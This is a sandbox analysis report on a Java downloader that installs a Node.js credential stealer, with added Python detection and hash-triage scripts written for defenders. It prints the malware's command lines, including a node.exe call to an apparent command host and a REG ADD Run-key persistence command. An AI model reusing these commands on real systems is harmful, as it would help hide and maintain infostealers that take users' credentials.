PROPERTY DESIGNS.jar

General

  Target:     PROPERTY DESIGNS.jar
  Filesize:   463KB
  Completed:  13-10-2020 05:19
  Score:      10/10
  MD5:        40e02d493aca746150f7c1b93b6d3ec7
  SHA1:       59c16f093953ec650f8d40abddf42fa1a8c5576e
  SHA256:     e2af2abfd29faf04991e4106528a65260c8173c06b756c124399ee955bec08c1

Signatures 10

Tactics observed: Collection, Credential Access, Defense Evasion, Discovery, Persistence
  • QNodeService

    Description

    Trojan/stealer written in Node.js and spread via a Java downloader.

  • Executes dropped EXE
    node.exe (3 processes)

    Reported IOCs

    pid   process
    1164  node.exe
    3268  node.exe
    1188  node.exe
  • Loads dropped DLL
    node.exe

    Reported IOCs

    pid   process   events
    1188  node.exe  6

    The six load events match the six 1188-*.node files listed under Downloads; a .node file is a Node.js native addon, which is a DLL loaded into the node.exe process.
  • Reads user/profile data of web browsers

    Description

    Infostealers often target stored browser data, which can include saved credentials and other secrets kept in the browser profile.

    TTPs

    Data from Local System, Credentials in Files
  • Adds Run key to start application
    reg.exe

    TTPs

    Registry Run Keys / Startup Folder, Modify Registry

    Reported IOCs

    description      ioc                                                                                                                                                                                      process
    Key created      \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run                                                                            reg.exe
    Set value (str)  \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\7366fb72-5dc0-4232-a593-e5d5eafc2b61 = "cmd /D /C \"C:\\Users\\Admin\\qhub\\node\\2.0.10\\boot.vbs\""  reg.exe

    The value name is a bare GUID and the data is a cmd.exe wrapper around a .vbs under the user profile. Note that the same value is deleted again later in the run (REG DELETE via pid 2756/2628, see Processes), so the persistence is not left in place in this sandbox execution.
  • JavaScript code in executable

    Reported IOCs

    resource                                      yara_rule
    behavioral2/files/0x000100000001ad8e-168.dat  js
    behavioral2/files/0x000100000001ad8e-173.dat  js
    behavioral2/files/0x000100000001ad8e-177.dat  js
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow  ioc
    15    wtfismyip.com
    16    wtfismyip.com
  • Checks processor information in registry
    node.exe

    Description

    Processor information is often read in order to detect sandboxing environments. Caveat: ProcessorNameString and ~MHz under each CentralProcessor\N key are exactly the values Node.js reads (through libuv) to implement os.cpus() on Windows, so this hit is consistent with ordinary Node.js runtime behaviour and is weak evidence of sandbox evasion on its own.

    TTPs

    Query Registry, System Information Discovery

    Reported IOCs

    description        ioc                                                                                 process
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString  node.exe
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0                      node.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz                 node.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  node.exe
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1                      node.exe
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz                 node.exe
  • Suspicious behavior: EnumeratesProcesses
    node.exe (3 processes)

    Reported IOCs

    pid   process   events
    1164  node.exe  4
    3268  node.exe  4
    1188  node.exe  10
  • Suspicious use of WriteProcessMemory
    java.exe, javaw.exe, node.exe (3 processes), cmd.exe (2 processes)

    Reported IOCs

    description                       pid   process    target process  events
    PID 3024 wrote to memory of 1776  3024  java.exe   javaw.exe       2
    PID 1776 wrote to memory of 1164  1776  javaw.exe  node.exe        2
    PID 1164 wrote to memory of 3268  1164  node.exe   node.exe        2
    PID 3268 wrote to memory of 1188  3268  node.exe   node.exe        2
    PID 1188 wrote to memory of 2308  1188  node.exe   cmd.exe         2
    PID 2308 wrote to memory of 1296  2308  cmd.exe    reg.exe         2
    PID 1188 wrote to memory of 2756  1188  node.exe   cmd.exe         2
    PID 2756 wrote to memory of 2628  2756  cmd.exe    reg.exe         2

    Every pair here is a parent writing into a child it has just created, which is what process creation looks like to this signature. The writes themselves are not the finding; the launch chain they trace (java.exe > javaw.exe > node.exe > node.exe > node.exe > cmd.exe > reg.exe) is.
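The signatures above describe behaviour; the block below turns the three that matter (Run-key persistence via a cmd.exe wrapper, a script runtime launched from the user profile with a hub domain, and a JVM re-launching a .tmp file as a jar) into detection logic that runs over process-creation records. This is an added example, not part of the sandbox report: the EVENTS list is constructed from this report's process tree in a Sysmon Event ID 1 shape (pid, ppid, image, command line), the benign reg.exe row is a control I added, and the rule names and heuristics are my own.

```python
"""Detection logic for the Run-key, hub-domain and .tmp-jar behaviour in this report.

Added example, not part of the sandbox report. EVENTS is constructed from the
report's process tree plus one benign control row; rule names are my own.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str
    ioc: str


# Constructed from the process tree in this report, plus one benign control row (pid 4100).
EVENTS = [
    ProcEvent(3024, 1, r"C:\ProgramData\Oracle\Java\javapath\java.exe",
              r'java -jar "C:\Users\Admin\AppData\Local\Temp\PROPERTY DESIGNS.jar"'),
    ProcEvent(1776, 3024, r"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe",
              r'"C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c653b37.tmp'),
    ProcEvent(1164, 1776, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain localhost --hub-domain wgloomlozs.hopto.org"),
    ProcEvent(1188, 3268, r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
              r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js --hub-domain localhost --hub-domain wgloomlozs.hopto.org"),
    ProcEvent(1296, 2308, r"C:\Windows\system32\reg.exe",
              r'REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""'),
    ProcEvent(2628, 2756, r"C:\Windows\system32\reg.exe",
              r'REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /F'),
    ProcEvent(4100, 900, r"C:\Windows\system32\reg.exe",  # benign control, must not fire
              r'REG QUERY "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /V ProductName'),
]

RUN_KEY = re.compile(r'REG\s+(ADD|DELETE)\s+"?(HK[A-Z_]*\\[^"\s]*\\CurrentVersion\\Run(?:Once)?)"?', re.I)
VALUE_NAME = re.compile(r'/V\s+"?([^"\s]+)', re.I)
RUN_DATA = re.compile(r'/D\s+"(.*)"\s*$', re.I)          # greedy: keeps the escaped inner quotes
GUID = re.compile(r'^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$', re.I)
CMD_WRAPPER = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s', re.I)
SCRIPT_IN_PROFILE = re.compile(r'\\Users\\[^\\]+\\.*\.(?:vbs|js|jse|wsf|bat|cmd|ps1)\b', re.I)
HUB_DOMAIN = re.compile(r'--hub-domain\s+(\S+)', re.I)
TMP_JAR = re.compile(r'-jar\s+"?[^"\s]*\\Temp\\[^"\s]*\.tmp\b', re.I)


def analyse(events):
    """Return Findings for the persistence, staging and relaunch patterns in `events`."""
    findings, run_adds = [], {}
    for ev in events:
        image = ev.image.lower()
        if image.endswith("\\reg.exe"):
            m = RUN_KEY.search(ev.cmdline)
            if not m:
                continue                                  # benign reg.exe usage
            op, key = m.group(1).upper(), m.group(2).lower()
            vm = VALUE_NAME.search(ev.cmdline)
            value = vm.group(1) if vm else ""
            ident = (key, value.lower())
            if op == "ADD":
                dm = RUN_DATA.search(ev.cmdline)
                data = dm.group(1) if dm else ""
                why = ["reg.exe writes a Run value"]
                if GUID.match(value):
                    why.append("value name is a bare GUID")
                if CMD_WRAPPER.match(data):
                    why.append("data is a cmd.exe wrapper")
                if SCRIPT_IN_PROFILE.search(data):
                    why.append("target is a script under the user profile")
                run_adds[ident] = ev.pid
                findings.append(Finding("run_key_persistence", ev.pid, "; ".join(why), data))
            elif ident in run_adds:
                # Add-then-delete in one run: cleanup, or a persistence toggle worth a closer look.
                findings.append(Finding("run_key_removed_same_run", ev.pid,
                                        f"value {value} added by pid {run_adds[ident]} was deleted again", key))
        elif image.endswith("\\node.exe") and "\\users\\" in image:
            hubs = [d for d in HUB_DOMAIN.findall(ev.cmdline) if d.lower() != "localhost"]
            if hubs:
                findings.append(Finding("node_hub_domain", ev.pid,
                                        "node.exe run from the user profile with --hub-domain", ",".join(hubs)))
        elif image.endswith(("\\java.exe", "\\javaw.exe")) and TMP_JAR.search(ev.cmdline):
            findings.append(Finding("jar_relaunched_from_tmp", ev.pid,
                                    "JVM re-launched a .tmp file as a jar", ev.cmdline))
    return findings


if __name__ == "__main__":
    for f in analyse(EVENTS):
        print(f"{f.rule:26} pid={f.pid:<5} {f.detail}  [{f.ioc}]")
```

The Run-key rule scores three independent properties of one command line (GUID value name, cmd.exe wrapper, script under the profile) rather than matching the exact path, so it survives the obvious renames; the add-then-delete pairing only fires when both events are present, which is the case here.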
Processes 9
  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar "C:\Users\Admin\AppData\Local\Temp\PROPERTY DESIGNS.jar"
    Suspicious use of WriteProcessMemory
    PID:3024
    • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
      "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar C:\Users\Admin\AppData\Local\Temp\7c653b37.tmp
      Suspicious use of WriteProcessMemory
      PID:1776
      • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
        C:\Users\Admin\node-v14.12.0-win-x64\node.exe - --hub-domain localhost --hub-domain wgloomlozs.hopto.org
        (the lone "-" argument makes node read the script from stdin, so this first stage is fed by javaw.exe rather than loaded from a file on disk)
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        PID:1164
        • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
          C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js --hub-domain localhost --hub-domain wgloomlozs.hopto.org
          Executes dropped EXE
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of WriteProcessMemory
          PID:3268
          • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
            C:\Users\Admin\node-v14.12.0-win-x64\node.exe C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js --hub-domain localhost --hub-domain wgloomlozs.hopto.org
            Executes dropped EXE
            Loads dropped DLL
            Checks processor information in registry
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of WriteProcessMemory
            PID:1188
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\"""
              Suspicious use of WriteProcessMemory
              PID:2308
              • C:\Windows\system32\reg.exe
                REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qhub\node\2.0.10\boot.vbs\""
                Adds Run key to start application
                PID:1296
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /F"
              Suspicious use of WriteProcessMemory
              PID:2756
              • C:\Windows\system32\reg.exe
                REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "7366fb72-5dc0-4232-a593-e5d5eafc2b61" /F
                PID:2628
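The process list above is already nested, but a sandbox's WriteProcessMemory table (or a Sysmon export) usually is not, and the useful question is "what sits above reg.exe?". The block below rebuilds the tree from the parent/child pairs and answers that. It is an added example, not part of the sandbox report: EDGES is copied from the WriteProcessMemory table (each pair really is reported twice, so the builder de-duplicates), and the "script runtime above reg.exe" heuristic is mine, not something the report states.

```python
"""Rebuild the launch chain from parent/child pairs and flag reg.exe under a script runtime.

Added example, not part of the sandbox report. EDGES is copied from the
WriteProcessMemory table above (duplicates included); the heuristic is my own.
"""
from collections import defaultdict

# (writer pid, writer image, target pid, target image), exactly as the report lists them.
EDGES = [
    (3024, "java.exe", 1776, "javaw.exe"), (3024, "java.exe", 1776, "javaw.exe"),
    (1776, "javaw.exe", 1164, "node.exe"), (1776, "javaw.exe", 1164, "node.exe"),
    (1164, "node.exe", 3268, "node.exe"), (1164, "node.exe", 3268, "node.exe"),
    (3268, "node.exe", 1188, "node.exe"), (3268, "node.exe", 1188, "node.exe"),
    (1188, "node.exe", 2308, "cmd.exe"), (1188, "node.exe", 2308, "cmd.exe"),
    (2308, "cmd.exe", 1296, "reg.exe"), (2308, "cmd.exe", 1296, "reg.exe"),
    (1188, "node.exe", 2756, "cmd.exe"), (1188, "node.exe", 2756, "cmd.exe"),
    (2756, "cmd.exe", 2628, "reg.exe"), (2756, "cmd.exe", 2628, "reg.exe"),
]

# Runtimes that should not normally be the ancestor of a registry edit (my list, extend as needed).
SCRIPT_RUNTIMES = {"node.exe", "java.exe", "javaw.exe", "wscript.exe", "cscript.exe", "powershell.exe"}


def build_tree(edges):
    """Return (parent, name, children) maps; a repeated pair is collapsed, a conflicting one is an error."""
    parent, name, children = {}, {}, defaultdict(list)
    for ppid, pname, pid, cname in edges:
        name[ppid] = pname
        name[pid] = cname
        if pid in parent:
            if parent[pid] != ppid:
                raise ValueError(f"pid {pid} reported with two parents ({parent[pid]}, {ppid})")
            continue                      # duplicate row from the report
        parent[pid] = ppid
        children[ppid].append(pid)
    return parent, name, children


def ancestry(pid, parent):
    """Root-first chain of pids ending at `pid`."""
    chain = [pid]
    while chain[-1] in parent:
        chain.append(parent[chain[-1]])
    return chain[::-1]


def roots(parent, name):
    return sorted(p for p in name if p not in parent)


def leaves(children, name):
    return sorted(p for p in name if not children.get(p))


def render(pid, name, children, depth=0):
    """Indented text tree, one line per process."""
    lines = [f"{'  ' * depth}{name[pid]} ({pid})"]
    for child in children.get(pid, []):
        lines.extend(render(child, name, children, depth + 1))
    return lines


def script_runtime_above(pid, parent, name):
    """True if any ancestor of `pid` is a script/JVM runtime.
    A reg.exe descending from node.exe is far more interesting than one under explorer.exe."""
    return any(name[p] in SCRIPT_RUNTIMES for p in ancestry(pid, parent)[:-1])


if __name__ == "__main__":
    parent, name, children = build_tree(EDGES)
    for root in roots(parent, name):
        print("\n".join(render(root, name, children)))
    for leaf in leaves(children, name):
        flag = "SUSPICIOUS" if script_runtime_above(leaf, parent, name) else "ok"
        print(f"{name[leaf]} ({leaf}): {' > '.join(name[p] for p in ancestry(leaf, parent))}  [{flag}]")
```

Ancestry-based rules of this shape are more robust than matching the immediate parent only: here the direct parent of each reg.exe is cmd.exe, which on its own is unremarkable, and the signal is node.exe two levels up.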
Downloads
  • C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp
    (zero-byte file: these are the well-known digests of empty input, and the file is a JRE usage-tracking artifact, not malware)
    MD5     d41d8cd98f00b204e9800998ecf8427e
    SHA1    da39a3ee5e6b4b0d3255bfef95601890afd80709
    SHA256  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
    SHA512  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

  • C:\Users\Admin\AppData\Local\Temp\7c653b37.tmp
    (identical to the submitted PROPERTY DESIGNS.jar: the loader copies itself to %TEMP% under a random .tmp name and re-launches the copy with javaw.exe, see Processes)
    MD5     40e02d493aca746150f7c1b93b6d3ec7
    SHA1    59c16f093953ec650f8d40abddf42fa1a8c5576e
    SHA256  e2af2abfd29faf04991e4106528a65260c8173c06b756c124399ee955bec08c1
    SHA512  f7be6768ae7f772f4455e423f766fdbd80ed9a628be15dfae05e78a5d91790a2922838c15f9cf185bb58d3bf29e8e248c5fb0e8c909e9cd311b1c690908494db

  • C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js
    MD5     3859487feb5152e9d1afc4f8cd320608
    SHA1    7bf154c9ddf3a71abf15906cdb60773e8ae07b62
    SHA256  8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13
    SHA512  826a1b3cd08e4652744a975153448288dd31073f60471729b948d7668df8e510fa7b0c6dcd63636043850364bf3cd30c1053349d42d08f8ec7c4a0655188fab8

  • C:\Users\Admin\node-v14.12.0-win-x64\node.exe
    (listed three times in the report with identical hashes; the dropped Node.js runtime, v14.12.0 win-x64 according to the path. Verify the hash against the vendor release before treating it as a malicious indicator.)
    MD5     f0b11a5823c45fc2664e116dc0323bcb
    SHA1    612339040c1f927ec62186cd5012f4bb9c53c1b9
    SHA256  16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99
    SHA512  0e07919012d0764aef67ae20c69d66f0c2279137d3459c8437f00c63f0e868a79c52d5ddeb57b9273009780b147bb46b1f429248a8b1f946981097b8e5e851ac

  The six *.node files below are Node.js native addons (DLLs) named after pid 1188; they account for the six "Loads dropped DLL" events reported for that process.

  • \Users\Admin\AppData\Local\Temp\1188-17a42ad825eb1bc3.node
    MD5     f1c9cde23537dc338fb765f2c125f994
    SHA1    6f290977d6e0666c4798b4bc17f640a18598a772
    SHA256  8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b
    SHA512  1bbdd3e50d4bcd09ca8e107596497ff3b20d82d728d485ca6eb1ee8660de0c3f4fe24dcc1657f2f59bc4f99fa2ddd525a0446eaed7999ed23b34fe8963750307

  • \Users\Admin\AppData\Local\Temp\1188-369b0ad7a9be82d3.node
    MD5     911a4b53a8ffd6e01c0196c682f06a49
    SHA1    5d0a4de0f72eede786da60fe49620e27b35d388d
    SHA256  f39651fc570f90b0c01655c61c80c3956c6f6c54df5aa8e0aae626f2cb718008
    SHA512  f2081eb8821f8289fdb1e907073a58381212af4872a6759c55f73667eba532bccea1e9f5695a31680708bf62e1b6da08f9e6bb21e1fec9db08ae81db57a9e6ea

  • \Users\Admin\AppData\Local\Temp\1188-4587c35f1285a35f.node
    MD5     87f2661da9a09dc36a1e39b53692e172
    SHA1    fc6a37bfcd72d7d70a3afb6fbd752bf1e0b0990f
    SHA256  7d2532530cd09d589348e1d6c2a46af4d3de73ee72941a4ee5b65cd21c17ddea
    SHA512  7187b2761245b470f4dbdbaa258e8d3cc1f2491bea2f7649212d8abcef1ccfb4c4b7fe4d0a37ca47840dd21eea9d799c94367af43c98027ba6f1247162a9e713

  • \Users\Admin\AppData\Local\Temp\1188-78ad011080742590.node
    MD5     df45601340083518d8bcc10ec848460b
    SHA1    8613d6ab3040d57d241ed4a466c1fffb1b12455b
    SHA256  eebfd03defaa0965393ebde5cd45a982dda75c82d5205a702f88deec660723ed
    SHA512  0e1e14dd82119dc822dccc4da4d64cce62a7796ec1157defa97b4bc29d767d164e6ef65861448b24c4972cc3919bf1583518ba725757c0f96af47a942380cd41

  • \Users\Admin\AppData\Local\Temp\1188-98b08082c62305e6.node
    MD5     ee6e80bab410c751c935e6175acf8b5c
    SHA1    c44cad6425db5c9c86351f9f9f7b019b876db528
    SHA256  dd3bd6107fb87be3c34985df2a8a0645fa7a89172d23ddb66fec64c3236a1af3
    SHA512  c654c44cfe115a9c4f9eaf6ed4207511c17dc4eeb00441c2be6413d0a16c348fce0dcf282f2b9132948150e3541d248edd62b2e055a1cd902f80b9a67d2e1d77

  • \Users\Admin\AppData\Local\Temp\1188-e60b063fc8833b6a.node
    MD5     2e20508eac344dfead52bdc25b73a7fb
    SHA1    c2918d63d3c0f14dce0552530ef0793f3a76bfa7
    SHA256  500e8c83a3d455c26d20fb32e02c26a47a6c7fa906ce2c0491729b731906ac98
    SHA512  25f8c95eb38a39e7ea60145e598f8e00b3b4c61f9ef6ae1689d3be16da7bd7c0d57a55d0d06a8402af694be880408ca6ef01829b79d9768d09967db5e3a2b8de

  Memory dumps

  • memory/1164-167-0x0000000000000000-mapping.dmp
  • memory/1164-171-0x000002ED10E80000-0x000002ED10E81000-memory.dmp
  • memory/1188-178-0x000003B408D80000-0x000003B408D81000-memory.dmp
  • memory/1188-176-0x0000000000000000-mapping.dmp
  • memory/1296-180-0x0000000000000000-mapping.dmp
  • memory/1776-50-0x0000000000000000-mapping.dmp
  • memory/2308-179-0x0000000000000000-mapping.dmp
  • memory/2628-188-0x0000000000000000-mapping.dmp
  • memory/2756-187-0x0000000000000000-mapping.dmp
  • memory/3268-174-0x000002D1D7D80000-0x000002D1D7D81000-memory.dmp
  • memory/3268-172-0x0000000000000000-mapping.dmp
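Before any of the hashes above go into a blocklist they should be sorted: the empty file and the copy of the submitted sample add nothing, the Node.js runtime is listed three times and is a vendor binary, and only the remaining artifacts are candidates. The block below does that sorting and checks the "empty input" claim with hashlib rather than trusting it. This is an added example, not part of the sandbox report; ENTRIES is copied from the Downloads list (a subset, with node.exe repeated three times as the report lists it), SAMPLE_SHA256 is the submitted jar's hash, and the category names are mine.

```python
"""Sort a sandbox's dropped-file hash list into empty, sample-copy, duplicate and candidate sets.

Added example, not part of the sandbox report. ENTRIES is copied from the
Downloads section (subset); SAMPLE_SHA256 is the submitted jar's SHA-256.
"""
import hashlib
from collections import defaultdict

SAMPLE_SHA256 = "e2af2abfd29faf04991e4106528a65260c8173c06b756c124399ee955bec08c1"
ALGS = ("md5", "sha1", "sha256")

# (path, md5, sha1, sha256) as listed in the report; node.exe really is listed three times.
ENTRIES = [
    (r"C:\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp",
     "d41d8cd98f00b204e9800998ecf8427e", "da39a3ee5e6b4b0d3255bfef95601890afd80709",
     "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"),
    (r"C:\Users\Admin\AppData\Local\Temp\7c653b37.tmp",
     "40e02d493aca746150f7c1b93b6d3ec7", "59c16f093953ec650f8d40abddf42fa1a8c5576e",
     "e2af2abfd29faf04991e4106528a65260c8173c06b756c124399ee955bec08c1"),
    (r"C:\Users\Admin\AppData\Local\Temp\_qhub_node_gSbwIZ\boot.js",
     "3859487feb5152e9d1afc4f8cd320608", "7bf154c9ddf3a71abf15906cdb60773e8ae07b62",
     "8d19e156776805eb800ad47f85ff36b99b8283b721ebab3d47a16e2ae597fe13"),
] + [
    (r"C:\Users\Admin\node-v14.12.0-win-x64\node.exe",
     "f0b11a5823c45fc2664e116dc0323bcb", "612339040c1f927ec62186cd5012f4bb9c53c1b9",
     "16fb671d2b06196482243fc31afb9cc0914c191b08181e71e20d872b51b09d99"),
] * 3 + [
    (r"\Users\Admin\AppData\Local\Temp\1188-17a42ad825eb1bc3.node",
     "f1c9cde23537dc338fb765f2c125f994", "6f290977d6e0666c4798b4bc17f640a18598a772",
     "8f73b3d91365fc1a09da9e8029a47f8ad5dd24d0dab03b01cd50de5806c8fb6b"),
]


def empty_digests():
    """Digests of zero-length input, computed rather than hard-coded."""
    return {alg: hashlib.new(alg, b"").hexdigest() for alg in ALGS}


def triage(entries, sample_sha256):
    """Group dropped files: empty, copies of the sample, inconsistent rows, and blocklist candidates."""
    empty = empty_digests()
    out = {"empty": [], "sample_copies": [], "inconsistent": [], "candidates": [], "listings": {}}
    by_sha256 = defaultdict(list)
    for path, *digests in entries:
        digests = dict(zip(ALGS, (d.lower() for d in digests)))
        by_sha256[digests["sha256"]].append(path)
        empty_hits = sum(digests[a] == empty[a] for a in ALGS)
        if empty_hits == len(ALGS):
            out["empty"].append(path)
        elif empty_hits:
            # One algorithm says "empty" and another does not: a copy/paste or extraction error.
            out["inconsistent"].append(path)
        elif digests["sha256"] == sample_sha256:
            out["sample_copies"].append(path)
    for sha256, paths in by_sha256.items():
        out["listings"][sha256] = len(paths)           # how often the report repeats this hash
        if sha256 not in (empty["sha256"], sample_sha256):
            out["candidates"].append(sha256)
    # Candidates still need a human: a vendor binary such as node.exe must be checked
    # against its official release hash before it is blocklisted.
    return out


if __name__ == "__main__":
    for key, value in triage(ENTRIES, SAMPLE_SHA256).items():
        print(f"{key}: {value}")
```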